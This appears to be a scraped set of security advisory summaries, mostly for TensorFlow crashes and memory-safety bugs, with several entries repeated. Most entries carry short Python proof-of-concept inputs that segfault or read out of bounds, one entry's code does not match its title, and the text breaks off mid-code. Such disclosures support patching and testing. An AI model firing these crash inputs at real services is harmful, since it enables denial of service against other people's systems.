The implementation of tf.raw_ops.FractionalMaxPoolGrad triggers an undefined behavior if one of the input tensors is empty: import tensorflow as tf orig_input = tf.constant([2, 3], shape=[1, 1, 1, 2], dtype=tf.int64) orig_output = tf.constant([], dtype=tf.int64) out_backprop = tf.zeros([2, 3, 6, 6], dtype=tf.int64) row_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) col_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) tf.raw_ops.FractionalMaxPoolGrad( orig_input=orig_input, orig_output=orig_output, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=False) The code is also vulnerable to a denial of service attack as a …

Type confusion during tensor casts lead to dereferencing null pointers

Calling TF operations with tensors of non-numeric types when the operations expect numeric tensors result in null pointer dereferences. There are multiple ways to reproduce this, listing a few examples here: import tensorflow as tf import numpy as np data = tf.random.truncated_normal(shape=1,mean=np.float32(20.8739),stddev=779.973,dtype=20,seed=64) import tensorflow as tf import numpy as np data = tf.random.stateless_truncated_normal(shape=1,seed=[63,70],mean=np.float32(20.8739),stddev=779.973,dtype=20) import tensorflow as tf import numpy as np data = tf.one_hot(indices=[62,50],depth=136,on_value=np.int32(237),off_value=158,axis=856,dtype=20) import tensorflow as tf import numpy …

Type confusion during tensor casts lead to dereferencing null pointers

Calling TF operations with tensors of non-numeric types when the operations expect numeric tensors result in null pointer dereferences. There are multiple ways to reproduce this, listing a few examples here: import tensorflow as tf import numpy as np data = tf.random.truncated_normal(shape=1,mean=np.float32(20.8739),stddev=779.973,dtype=20,seed=64) import tensorflow as tf import numpy as np data = tf.random.stateless_truncated_normal(shape=1,seed=[63,70],mean=np.float32(20.8739),stddev=779.973,dtype=20) import tensorflow as tf import numpy as np data = tf.one_hot(indices=[62,50],depth=136,on_value=np.int32(237),off_value=158,axis=856,dtype=20) import tensorflow as tf import numpy …

Type confusion during tensor casts lead to dereferencing null pointers

Calling TF operations with tensors of non-numeric types when the operations expect numeric tensors result in null pointer dereferences. There are multiple ways to reproduce this, listing a few examples here: import tensorflow as tf import numpy as np data = tf.random.truncated_normal(shape=1,mean=np.float32(20.8739),stddev=779.973,dtype=20,seed=64) import tensorflow as tf import numpy as np data = tf.random.stateless_truncated_normal(shape=1,seed=[63,70],mean=np.float32(20.8739),stddev=779.973,dtype=20) import tensorflow as tf import numpy as np data = tf.one_hot(indices=[62,50],depth=136,on_value=np.int32(237),off_value=158,axis=856,dtype=20) import tensorflow as tf import numpy …

Stack overflow due to looping TFLite subgraph

TFLite graphs must not have loops between nodes. However, this condition was not checked, and an attacker could craft models that would result in an infinite loop during evaluation. In certain cases, the infinite loop would be replaced by a stack overflow due to too many recursive calls.

Stack overflow due to looping TFLite subgraph

TFLite graphs must not have loops between nodes. However, this condition was not checked, and an attacker could craft models that would result in an infinite loop during evaluation. In certain cases, the infinite loop would be replaced by a stack overflow due to too many recursive calls.

Stack overflow due to looping TFLite subgraph

TFLite graphs must not have loops between nodes. However, this condition was not checked, and an attacker could craft models that would result in an infinite loop during evaluation. In certain cases, the infinite loop would be replaced by a stack overflow due to too many recursive calls.

Session operations in eager mode lead to null pointer dereferences

In eager mode (default in TF 2.0 and later), session operations are invalid. However, users could still call the raw ops associated with them and trigger a null pointer dereference: import tensorflow as tf tf.raw_ops.GetSessionTensor(handle=['\x12\x1a\x07'],dtype=4) import tensorflow as tf tf.raw_ops.DeleteSessionTensor(handle=['\x12\x1a\x07'])

Segfault in tf.raw_ops.ImmutableConst

Calling tf.raw_ops.ImmutableConst with a dtype of tf.resource or tf.variant results in a segfault in the implementation as code assumes that the tensor contents are pure scalars. >>> import tensorflow as tf >>> tf.raw_ops.ImmutableConst(dtype=tf.resource, shape=[], memory_region_name="/tmp/test.txt") … Segmentation fault

Segfault in tf.raw_ops.ImmutableConst

Calling tf.raw_ops.ImmutableConst with a dtype of tf.resource or tf.variant results in a segfault in the implementation as code assumes that the tensor contents are pure scalars. >>> import tensorflow as tf >>> tf.raw_ops.ImmutableConst(dtype=tf.resource, shape=[], memory_region_name="/tmp/test.txt") … Segmentation fault

Segfault in tf.raw_ops.ImmutableConst

Calling tf.raw_ops.ImmutableConst with a dtype of tf.resource or tf.variant results in a segfault in the implementation as code assumes that the tensor contents are pure scalars. >>> import tensorflow as tf >>> tf.raw_ops.ImmutableConst(dtype=tf.resource, shape=[], memory_region_name="/tmp/test.txt") … Segmentation fault

Segfault in SparseCountSparseOutput

Specifying a negative dense shape in tf.raw_ops.SparseCountSparseOutput results in a segmentation fault being thrown out from the standard library as std::vector invariants are broken. import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0, 0], dtype=tf.int64) dense_shape = tf.constant([-100, -100, -100], shape=[3], dtype=tf.int64) weights = tf.constant([], shape=[0, 0], dtype=tf.int64) tf.raw_ops.SparseCountSparseOutput(indices=indices, values=values, dense_shape=dense_shape, weights=weights, minlength=79, maxlength=96, binary_output=False)

Segfault in SparseCountSparseOutput

Specifying a negative dense shape in tf.raw_ops.SparseCountSparseOutput results in a segmentation fault being thrown out from the standard library as std::vector invariants are broken. import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0, 0], dtype=tf.int64) dense_shape = tf.constant([-100, -100, -100], shape=[3], dtype=tf.int64) weights = tf.constant([], shape=[0, 0], dtype=tf.int64) tf.raw_ops.SparseCountSparseOutput(indices=indices, values=values, dense_shape=dense_shape, weights=weights, minlength=79, maxlength=96, binary_output=False)

Segfault in SparseCountSparseOutput

Specifying a negative dense shape in tf.raw_ops.SparseCountSparseOutput results in a segmentation fault being thrown out from the standard library as std::vector invariants are broken. import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0, 0], dtype=tf.int64) dense_shape = tf.constant([-100, -100, -100], shape=[3], dtype=tf.int64) weights = tf.constant([], shape=[0, 0], dtype=tf.int64) tf.raw_ops.SparseCountSparseOutput(indices=indices, values=values, dense_shape=dense_shape, weights=weights, minlength=79, maxlength=96, binary_output=False)

Segfault in `CTCBeamSearchDecoder`

Due to lack of validation in tf.raw_ops.CTCBeamSearchDecoder, an attacker can trigger denial of service via segmentation faults: import tensorflow as tf inputs = tf.constant([], shape=[18, 8, 0], dtype=tf.float32) sequence_length = tf.constant([11, -43, -92, 11, -89, -83, -35, -100], shape=[8], dtype=tf.int32) beam_width = 10 top_paths = 3 merge_repeated = True tf.raw_ops.CTCBeamSearchDecoder( inputs=inputs, sequence_length=sequence_length, beam_width=beam_width, top_paths=top_paths, merge_repeated=merge_repeated)

Segfault in `CTCBeamSearchDecoder`

Due to lack of validation in tf.raw_ops.CTCBeamSearchDecoder, an attacker can trigger denial of service via segmentation faults: import tensorflow as tf inputs = tf.constant([], shape=[18, 8, 0], dtype=tf.float32) sequence_length = tf.constant([11, -43, -92, 11, -89, -83, -35, -100], shape=[8], dtype=tf.int32) beam_width = 10 top_paths = 3 merge_repeated = True tf.raw_ops.CTCBeamSearchDecoder( inputs=inputs, sequence_length=sequence_length, beam_width=beam_width, top_paths=top_paths, merge_repeated=merge_repeated)

Segfault in `CTCBeamSearchDecoder`

Due to lack of validation in tf.raw_ops.CTCBeamSearchDecoder, an attacker can trigger denial of service via segmentation faults: import tensorflow as tf inputs = tf.constant([], shape=[18, 8, 0], dtype=tf.float32) sequence_length = tf.constant([11, -43, -92, 11, -89, -83, -35, -100], shape=[8], dtype=tf.int32) beam_width = 10 top_paths = 3 merge_repeated = True tf.raw_ops.CTCBeamSearchDecoder( inputs=inputs, sequence_length=sequence_length, beam_width=beam_width, top_paths=top_paths, merge_repeated=merge_repeated)

Reference binding to nullptr in `SdcaOptimizer`

The implementation of tf.raw_ops.SdcaOptimizer triggers undefined behavior due to dereferencing a null pointer: import tensorflow as tf sparse_example_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_indices = [tf.constant([], shape=[0, 0, 0, 0], dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_values = [] dense_features = [] dense_weights = [] example_weights = tf.constant((0.0), dtype=tf.float32) example_labels = tf.constant((0.0), dtype=tf.float32) sparse_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_weights = [tf.constant((0.0), dtype=tf.float32), tf.constant((0.0), dtype=tf.float32)] example_state_data = tf.constant([0.0, 0.0, 0.0, 0.0], shape=[1, 4], …

Reference binding to nullptr in `SdcaOptimizer`

The implementation of tf.raw_ops.SdcaOptimizer triggers undefined behavior due to dereferencing a null pointer: import tensorflow as tf sparse_example_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_indices = [tf.constant([], shape=[0, 0, 0, 0], dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_values = [] dense_features = [] dense_weights = [] example_weights = tf.constant((0.0), dtype=tf.float32) example_labels = tf.constant((0.0), dtype=tf.float32) sparse_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_weights = [tf.constant((0.0), dtype=tf.float32), tf.constant((0.0), dtype=tf.float32)] example_state_data = tf.constant([0.0, 0.0, 0.0, 0.0], shape=[1, 4], …

Reference binding to nullptr in `SdcaOptimizer`

The implementation of tf.raw_ops.SdcaOptimizer triggers undefined behavior due to dereferencing a null pointer: import tensorflow as tf sparse_example_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_indices = [tf.constant([], shape=[0, 0, 0, 0], dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_values = [] dense_features = [] dense_weights = [] example_weights = tf.constant((0.0), dtype=tf.float32) example_labels = tf.constant((0.0), dtype=tf.float32) sparse_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_weights = [tf.constant((0.0), dtype=tf.float32), tf.constant((0.0), dtype=tf.float32)] example_state_data = tf.constant([0.0, 0.0, 0.0, 0.0], shape=[1, 4], …

Reference binding to null pointer in `MatrixDiag*` ops

The implementation of MatrixDiag* operations does not validate that the tensor arguments are non-empty: num_rows = context->input(2).flat<int32>()(0); num_cols = context->input(3).flat<int32>()(0); padding_value = context->input(4).flat<T>()(0); Thus, users can trigger null pointer dereferences if any of the above tensors are null: import tensorflow as tf d = tf.convert_to_tensor([],dtype=tf.float32) p = tf.convert_to_tensor([],dtype=tf.float32) tf.raw_ops.MatrixDiagV2(diagonal=d, k=0, num_rows=0, num_cols=0, padding_value=p) Changing from tf.raw_ops.MatrixDiagV2 to tf.raw_ops.MatrixDiagV3 still reproduces the issue.

Reference binding to null pointer in `MatrixDiag*` ops

The implementation of MatrixDiag* operations does not validate that the tensor arguments are non-empty: num_rows = context->input(2).flat<int32>()(0); num_cols = context->input(3).flat<int32>()(0); padding_value = context->input(4).flat<T>()(0); Thus, users can trigger null pointer dereferences if any of the above tensors are null: import tensorflow as tf d = tf.convert_to_tensor([],dtype=tf.float32) p = tf.convert_to_tensor([],dtype=tf.float32) tf.raw_ops.MatrixDiagV2(diagonal=d, k=0, num_rows=0, num_cols=0, padding_value=p) Changing from tf.raw_ops.MatrixDiagV2 to tf.raw_ops.MatrixDiagV3 still reproduces the issue.

Reference binding to null pointer in `MatrixDiag*` ops

The implementation of MatrixDiag* operations does not validate that the tensor arguments are non-empty: num_rows = context->input(2).flat<int32>()(0); num_cols = context->input(3).flat<int32>()(0); padding_value = context->input(4).flat<T>()(0); Thus, users can trigger null pointer dereferences if any of the above tensors are null: import tensorflow as tf d = tf.convert_to_tensor([],dtype=tf.float32) p = tf.convert_to_tensor([],dtype=tf.float32) tf.raw_ops.MatrixDiagV2(diagonal=d, k=0, num_rows=0, num_cols=0, padding_value=p) Changing from tf.raw_ops.MatrixDiagV2 to tf.raw_ops.MatrixDiagV3 still reproduces the issue.

Reference binding to null in `ParameterizedTruncatedNormal`

An attacker can trigger undefined behavior by binding to null pointer in tf.raw_ops.ParameterizedTruncatedNormal: import tensorflow as tf shape = tf.constant([], shape=[0], dtype=tf.int32) means = tf.constant((1), dtype=tf.float32) stdevs = tf.constant((1), dtype=tf.float32) minvals = tf.constant((1), dtype=tf.float32) maxvals = tf.constant((1), dtype=tf.float32) tf.raw_ops.ParameterizedTruncatedNormal( shape=shape, means=means, stdevs=stdevs, minvals=minvals, maxvals=maxvals)

Reference binding to null in `ParameterizedTruncatedNormal`

An attacker can trigger undefined behavior by binding to null pointer in tf.raw_ops.ParameterizedTruncatedNormal: import tensorflow as tf shape = tf.constant([], shape=[0], dtype=tf.int32) means = tf.constant((1), dtype=tf.float32) stdevs = tf.constant((1), dtype=tf.float32) minvals = tf.constant((1), dtype=tf.float32) maxvals = tf.constant((1), dtype=tf.float32) tf.raw_ops.ParameterizedTruncatedNormal( shape=shape, means=means, stdevs=stdevs, minvals=minvals, maxvals=maxvals)

Reference binding to null in `ParameterizedTruncatedNormal`

An attacker can trigger undefined behavior by binding to null pointer in tf.raw_ops.ParameterizedTruncatedNormal: import tensorflow as tf shape = tf.constant([], shape=[0], dtype=tf.int32) means = tf.constant((1), dtype=tf.float32) stdevs = tf.constant((1), dtype=tf.float32) minvals = tf.constant((1), dtype=tf.float32) maxvals = tf.constant((1), dtype=tf.float32) tf.raw_ops.ParameterizedTruncatedNormal( shape=shape, means=means, stdevs=stdevs, minvals=minvals, maxvals=maxvals)

RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as random as they should be

A security-sensitive bug was discovered by Open Source Developer Erik Sundell of Sundell Open Source Consulting AB. The functions RandomAlphaNumeric(int) and CryptoRandomAlphaNumeric(int) are not as random as they should be. Small values of int in the functions above will return a smaller subset of results than they should. For example, RandomAlphaNumeric(1) will always return a digit in the 0-9 range, while RandomAlphaNumeric(4) will return around ~7 million of the ~13M …

Path Traversal

Untrusted users should not be assigned the Zope Manager role and adding/editing Zope Page Templates through the web should be restricted to trusted users only.

Overflow/denial of service in `tf.raw_ops.ReverseSequence`

The implementation of tf.raw_ops.ReverseSequence allows for stack overflow and/or CHECK-fail based denial of service. import tensorflow as tf input = tf.zeros([1, 1, 1], dtype=tf.int32) seq_lengths = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.ReverseSequence( input=input, seq_lengths=seq_lengths, seq_dim=-2, batch_dim=0)

Overflow/denial of service in `tf.raw_ops.ReverseSequence`

The implementation of tf.raw_ops.ReverseSequence allows for stack overflow and/or CHECK-fail based denial of service. import tensorflow as tf input = tf.zeros([1, 1, 1], dtype=tf.int32) seq_lengths = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.ReverseSequence( input=input, seq_lengths=seq_lengths, seq_dim=-2, batch_dim=0)

Overflow/denial of service in `tf.raw_ops.ReverseSequence`

The implementation of tf.raw_ops.ReverseSequence allows for stack overflow and/or CHECK-fail based denial of service. import tensorflow as tf input = tf.zeros([1, 1, 1], dtype=tf.int32) seq_lengths = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.ReverseSequence( input=input, seq_lengths=seq_lengths, seq_dim=-2, batch_dim=0)

Out-of-bounds Write

A heap-based buffer overflow in function WebPDecodeRGBInto is possible due to an invalid check for buffer size. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.

Out-of-bounds Read

An out-of-bounds read was found in function ChunkVerifyAndAssign. The highest threat from this vulnerability is to data confidentiality and to the service availability.

Out-of-bounds Read

An out-of-bounds read was found in function ChunkAssignData. The highest threat from this vulnerability is to data confidentiality and to the service availability.

OOB read in `MatrixTriangularSolve`

The implementation of MatrixTriangularSolve fails to terminate kernel execution if one validation condition fails: void ValidateInputTensors(OpKernelContext* ctx, const Tensor& in0, const Tensor& in1) override { OP_REQUIRES( ctx, in0.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in0.dims())); OP_REQUIRES( ctx, in1.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in1.dims())); } void Compute(OpKernelContext* ctx) override { const Tensor& in0 = ctx->input(0); const Tensor& in1 = ctx->input(1); ValidateInputTensors(ctx, in0, in1); …

OOB read in `MatrixTriangularSolve`

The implementation of MatrixTriangularSolve fails to terminate kernel execution if one validation condition fails: void ValidateInputTensors(OpKernelContext* ctx, const Tensor& in0, const Tensor& in1) override { OP_REQUIRES( ctx, in0.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in0.dims())); OP_REQUIRES( ctx, in1.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in1.dims())); } void Compute(OpKernelContext* ctx) override { const Tensor& in0 = ctx->input(0); const Tensor& in1 = ctx->input(1); ValidateInputTensors(ctx, in0, in1); …

OOB read in `MatrixTriangularSolve`

The implementation of MatrixTriangularSolve fails to terminate kernel execution if one validation condition fails: void ValidateInputTensors(OpKernelContext* ctx, const Tensor& in0, const Tensor& in1) override { OP_REQUIRES( ctx, in0.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in0.dims())); OP_REQUIRES( ctx, in1.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in1.dims())); } void Compute(OpKernelContext* ctx) override { const Tensor& in0 = ctx->input(0); const Tensor& in1 = ctx->input(1); ValidateInputTensors(ctx, in0, in1); …

Null pointer dereference via invalid Ragged Tensors

Calling tf.raw_ops.RaggedTensorToVariant with arguments specifying an invalid ragged tensor results in a null pointer dereference: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1]) import tensorflow as tf input_tensor = tf.constant([], shape=[2, 2, 2, 2, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 2, …

Null pointer dereference via invalid Ragged Tensors

Calling tf.raw_ops.RaggedTensorToVariant with arguments specifying an invalid ragged tensor results in a null pointer dereference: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1]) import tensorflow as tf input_tensor = tf.constant([], shape=[2, 2, 2, 2, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 2, …

Null pointer dereference via invalid Ragged Tensors

Calling tf.raw_ops.RaggedTensorToVariant with arguments specifying an invalid ragged tensor results in a null pointer dereference: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1]) import tensorflow as tf input_tensor = tf.constant([], shape=[2, 2, 2, 2, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 2, …

Null pointer dereference in TFLite's `Reshape` operator

The fix for CVE-2020-15209 missed the case when the target shape of Reshape operator is given by the elements of a 1-D tensor. As such, the fix for the vulnerability allowed passing a null-buffer-backed tensor with a 1D shape: if (tensor->data.raw == nullptr && tensor->bytes > 0) { if (registration.builtin_code == kTfLiteBuiltinReshape && i == 1) { // In general, having a tensor here with no buffer will be an …

Null pointer dereference in TFLite's `Reshape` operator

The fix for CVE-2020-15209 missed the case when the target shape of Reshape operator is given by the elements of a 1-D tensor. As such, the fix for the vulnerability allowed passing a null-buffer-backed tensor with a 1D shape: if (tensor->data.raw == nullptr && tensor->bytes > 0) { if (registration.builtin_code == kTfLiteBuiltinReshape && i == 1) { // In general, having a tensor here with no buffer will be an …

Null pointer dereference in TFLite's `Reshape` operator

The fix for CVE-2020-15209 missed the case when the target shape of Reshape operator is given by the elements of a 1-D tensor. As such, the fix for the vulnerability allowed passing a null-buffer-backed tensor with a 1D shape: if (tensor->data.raw == nullptr && tensor->bytes > 0) { if (registration.builtin_code == kTfLiteBuiltinReshape && i == 1) { // In general, having a tensor here with no buffer will be an …

Null pointer dereference in `StringNGrams`

An attacker can trigger a dereference of a null pointer in tf.raw_ops.StringNGrams: import tensorflow as tf data=tf.constant([''] * 11, shape=[11], dtype=tf.string) splits = [0]*115 splits.append(3) data_splits=tf.constant(splits, shape=[116], dtype=tf.int64) tf.raw_ops.StringNGrams(data=data, data_splits=data_splits, separator=b'Ss', ngram_widths=[7,6,11], left_pad='ABCDE', right_pad=b'ZYXWVU', pad_width=50, preserve_short_sequences=True)

Null pointer dereference in `StringNGrams`

An attacker can trigger a dereference of a null pointer in tf.raw_ops.StringNGrams: import tensorflow as tf data=tf.constant([''] * 11, shape=[11], dtype=tf.string) splits = [0]*115 splits.append(3) data_splits=tf.constant(splits, shape=[116], dtype=tf.int64) tf.raw_ops.StringNGrams(data=data, data_splits=data_splits, separator=b'Ss', ngram_widths=[7,6,11], left_pad='ABCDE', right_pad=b'ZYXWVU', pad_width=50, preserve_short_sequences=True)

Null pointer dereference in `StringNGrams`

An attacker can trigger a dereference of a null pointer in tf.raw_ops.StringNGrams: import tensorflow as tf data=tf.constant([''] * 11, shape=[11], dtype=tf.string) splits = [0]*115 splits.append(3) data_splits=tf.constant(splits, shape=[116], dtype=tf.int64) tf.raw_ops.StringNGrams(data=data, data_splits=data_splits, separator=b'Ss', ngram_widths=[7,6,11], left_pad='ABCDE', right_pad=b'ZYXWVU', pad_width=50, preserve_short_sequences=True)

Null pointer dereference in `SparseFillEmptyRows`

An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.SparseFillEmptyRows: import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) dense_shape = tf.constant([], shape=[0], dtype=tf.int64) default_value = 0 tf.raw_ops.SparseFillEmptyRows( indices=indices, values=values, dense_shape=dense_shape, default_value=default_value)

Null pointer dereference in `EditDistance`

An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.EditDistance: import tensorflow as tf hypothesis_indices = tf.constant([247, 247, 247], shape=[1, 3], dtype=tf.int64) hypothesis_values = tf.constant([-9.9999], shape=[1], dtype=tf.float32) hypothesis_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) truth_indices = tf.constant([], shape=[0, 3], dtype=tf.int64) truth_values = tf.constant([], shape=[0], dtype=tf.float32) truth_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) tf.raw_ops.EditDistance( hypothesis_indices=hypothesis_indices, hypothesis_values=hypothesis_values, hypothesis_shape=hypothesis_shape, truth_indices=truth_indices, truth_values=truth_values, truth_shape=truth_shape, normalize=True)
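
Reformatted reproducer; the comments are editorial, and the crash behaviour is as described in the advisory.

```python
import tensorflow as tf

# hypothesis_shape / truth_shape are all zeros while hypothesis_indices
# still points at coordinate [247, 247, 247].
hypothesis_indices = tf.constant([247, 247, 247], shape=[1, 3], dtype=tf.int64)
hypothesis_values = tf.constant([-9.9999], shape=[1], dtype=tf.float32)
hypothesis_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64)
truth_indices = tf.constant([], shape=[0, 3], dtype=tf.int64)
truth_values = tf.constant([], shape=[0], dtype=tf.float32)
truth_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64)

tf.raw_ops.EditDistance(
    hypothesis_indices=hypothesis_indices, hypothesis_values=hypothesis_values,
    hypothesis_shape=hypothesis_shape, truth_indices=truth_indices,
    truth_values=truth_values, truth_shape=truth_shape, normalize=True)
```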

Nil dereference in NATS JWT, DoS of nats-server

(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-26521.txt) Problem Description The NATS account system has an Operator trusted by the servers, which signs Accounts, and each Account can then create and sign Users within their account. The Operator should be able to safely issue Accounts to other entities which it does not fully trust. A malicious Account could create and sign a User JWT with a state not created by the normal tooling, …

Nil dereference in NATS JWT causing DoS of nats-server

(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-26521.txt) Problem Description The NATS account system has an Operator trusted by the servers, which signs Accounts, and each Account can then create and sign Users within their account. The Operator should be able to safely issue Accounts to other entities which it does not fully trust. A malicious Account could create and sign a User JWT with a state not created by the normal tooling, …

Memory corruption in `DrawBoundingBoxesV2`

The implementation of tf.raw_ops.DrawBoundingBoxesV2 can cause reads outside of bounds of heap allocated data if an attacker supplies specially crafted inputs: import tensorflow as tf images = tf.fill([10, 96, 0, 1], 0.) boxes = tf.fill([10, 53, 0], 0.) colors = tf.fill([0, 1], 0.) tf.raw_ops.DrawBoundingBoxesV2(images=images, boxes=boxes, colors=colors)
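
The reproducer as a standalone script; the comments are editorial.

```python
import tensorflow as tf

# Several of the dimensions below are zero, which is what triggers the
# out-of-bounds reads described in the advisory.
images = tf.fill([10, 96, 0, 1], 0.)
boxes = tf.fill([10, 53, 0], 0.)
colors = tf.fill([0, 1], 0.)

tf.raw_ops.DrawBoundingBoxesV2(images=images, boxes=boxes, colors=colors)
```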

Lack of validation in `SparseDenseCwiseMul`

Due to lack of validation in tf.raw_ops.SparseDenseCwiseMul, an attacker can trigger denial of service via CHECK-fails or accesses to outside the bounds of heap allocated data: import tensorflow as tf indices = tf.constant([], shape=[10, 0], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) shape = tf.constant([0, 0], shape=[2], dtype=tf.int64) dense = tf.constant([], shape=[0], dtype=tf.int64) tf.raw_ops.SparseDenseCwiseMul( sp_indices=indices, sp_values=values, sp_shape=shape, dense=dense)
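
Laid out line by line for readability (comments editorial):

```python
import tensorflow as tf

# sp_indices claims 10 rows yet holds no data, and sp_shape / dense are empty,
# which the op does not validate.
indices = tf.constant([], shape=[10, 0], dtype=tf.int64)
values = tf.constant([], shape=[0], dtype=tf.int64)
shape = tf.constant([0, 0], shape=[2], dtype=tf.int64)
dense = tf.constant([], shape=[0], dtype=tf.int64)

tf.raw_ops.SparseDenseCwiseMul(
    sp_indices=indices, sp_values=values, sp_shape=shape, dense=dense)
```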

Invalid validation in `SparseMatrixSparseCholesky`

An attacker can trigger a null pointer dereference by providing an invalid permutation to tf.raw_ops.SparseMatrixSparseCholesky: import tensorflow as tf import numpy as np from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops indices_array = np.array([[0, 0]]) value_array = np.array([-10.0], dtype=np.float32) dense_shape = [1, 1] st = tf.SparseTensor(indices_array, value_array, dense_shape) input = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix( st.indices, st.values, st.dense_shape) permutation = tf.constant([], shape=[1, 0], dtype=tf.int32) tf.raw_ops.SparseMatrixSparseCholesky(input=input, permutation=permutation, type=tf.float32)
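
The reproducer as a script; comments are editorial, and the CSR matrix is bound to a local name to avoid shadowing the Python builtin.

```python
import numpy as np
import tensorflow as tf
from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops

# Build a 1x1 CSR sparse matrix, then pass an empty (shape [1, 0]) tensor as
# the permutation, which is not a valid permutation of its rows.
indices_array = np.array([[0, 0]])
value_array = np.array([-10.0], dtype=np.float32)
dense_shape = [1, 1]
st = tf.SparseTensor(indices_array, value_array, dense_shape)
csr = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix(
    st.indices, st.values, st.dense_shape)
permutation = tf.constant([], shape=[1, 0], dtype=tf.int32)

tf.raw_ops.SparseMatrixSparseCholesky(input=csr, permutation=permutation, type=tf.float32)
```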

Invalid validation in `QuantizeAndDequantizeV2`

The validation in tf.raw_ops.QuantizeAndDequantizeV2 allows invalid values for axis argument: import tensorflow as tf input_tensor = tf.constant([0.0], shape=[1], dtype=float) input_min = tf.constant(-10.0) input_max = tf.constant(-10.0) tf.raw_ops.QuantizeAndDequantizeV2( input=input_tensor, input_min=input_min, input_max=input_max, signed_input=False, num_bits=1, range_given=False, round_mode='HALF_TO_EVEN', narrow_range=False, axis=-2)
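
The same call formatted as a script (comments editorial):

```python
import tensorflow as tf

input_tensor = tf.constant([0.0], shape=[1], dtype=float)
input_min = tf.constant(-10.0)
input_max = tf.constant(-10.0)

# axis=-2 is outside the valid range for a rank-1 input, yet it is accepted.
tf.raw_ops.QuantizeAndDequantizeV2(
    input=input_tensor, input_min=input_min, input_max=input_max,
    signed_input=False, num_bits=1, range_given=False,
    round_mode='HALF_TO_EVEN', narrow_range=False, axis=-2)
```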

Interpreter crash from `tf.io.decode_raw`

The implementation of tf.io.decode_raw produces incorrect results and crashes the Python interpreter when combining fixed_length and wider datatypes. import tensorflow as tf tf.io.decode_raw(tf.constant(["1","2","3","4"]), tf.uint16, fixed_length=4)
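
The one-line reproducer, spelled out with an editorial comment:

```python
import tensorflow as tf

# fixed_length=4 bytes combined with the 2-byte tf.uint16 output type is the
# combination the advisory describes as producing incorrect results and a crash.
tf.io.decode_raw(tf.constant(["1", "2", "3", "4"]), tf.uint16, fixed_length=4)
```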

Integer overflow in TFLite memory allocation

The TFLite code for allocating TFLiteIntArrays is vulnerable to an integer overflow issue: int TfLiteIntArrayGetSizeInBytes(int size) { static TfLiteIntArray dummy; return sizeof(dummy) + sizeof(dummy.data[0]) * size; } An attacker can craft a model such that the size multiplier is so large that the return value overflows the int datatype and becomes negative. In turn, this results in invalid value being given to malloc: TfLiteIntArray* TfLiteIntArrayCreate(int size) { TfLiteIntArray* ret = …
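
A small editorial sketch of the overflow arithmetic in Python rather than C; the header and element sizes below are assumptions chosen purely for illustration, not values taken from the TFLite sources.

```python
# Illustration only: a large attacker-chosen `size` makes
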